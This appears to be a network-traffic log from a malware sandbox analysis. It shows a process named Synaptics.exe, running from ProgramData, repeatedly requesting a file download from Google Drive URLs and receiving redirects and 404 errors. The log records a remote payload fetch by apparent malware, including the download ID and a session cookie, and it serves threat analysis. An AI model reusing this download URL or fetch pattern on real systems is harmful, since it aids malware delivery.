                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-f0ZCDQSXsFTEfjEEBHttUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:49 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:49 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="pszuRFFq1yDdbM_6i6KLUQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:49 UTC  122                IN         Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      66          192.168.2.11  50001        172.217.18.110   443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:25:49 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:50 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:49 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-fogthQojF7QeIrPurbLYRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      67          192.168.2.11  50002        142.250.181.225  443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:25:49 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:50 UTC  1243               IN         HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4lhRc7kI1H-7ND--89oA0PHovE6MFe6SeLvsYQdfyn_-s8bUHnYVukT5nYAx2Umc9f
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:49 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-AtBr2WPl96avxnZ9M590Yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:50 UTC  147                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:50 UTC  1390               IN         Data Ascii: t Found)!!1</title><style nonce="ZAk79NgokYhEzs84NBbwbw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:50 UTC  115                IN         Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      68          192.168.2.11  50005        172.217.18.110   443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:25:49 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:25:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:50 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-JJFSOvEM9w08pXuZiLrdBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.11 | 50008 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:50 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:25:50 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7B8J-w27zhAm1ALhObn4luC2q2_rzR_PqIJGMakPB1xSoKPjMSFeIjZT-oMerVwKHMqXFQt5o
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:50 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-miCajQDKrthPwyws8g76ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:25:50 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:50 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="Z9gJT4l3SWNJ5pwVgHnlHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:50 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.11 | 50012 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:50 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.11 | 50016 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:50 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.11 | 50017 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:50 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.11 | 50022 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:51 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:25:51 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:51 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-kUP4CuTy2T8iIDf_1XcTOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.11 | 50023 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:51 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:25:51 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:51 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-sb4Y6YBXridQLP_pGfBS4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.11 | 50031 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:52 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:52 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-kKBrDHA9vxLkK2jvFkCXDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      76 | 192.168.2.11 | 50033 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:52 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:52 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HLgB41SUJ8v3ReTe7rMENw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      77 | 192.168.2.11 | 50030 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:52 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:53 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6RbeOfp6JXwP5iQZw1PDY8rOeVzI3p2gDOR8zgMmljhjgSFSmnT5prkK1IYGkdX_2C41wx2IE
                                                                                                                                                      Content-Type: text/html; charset=utf-8
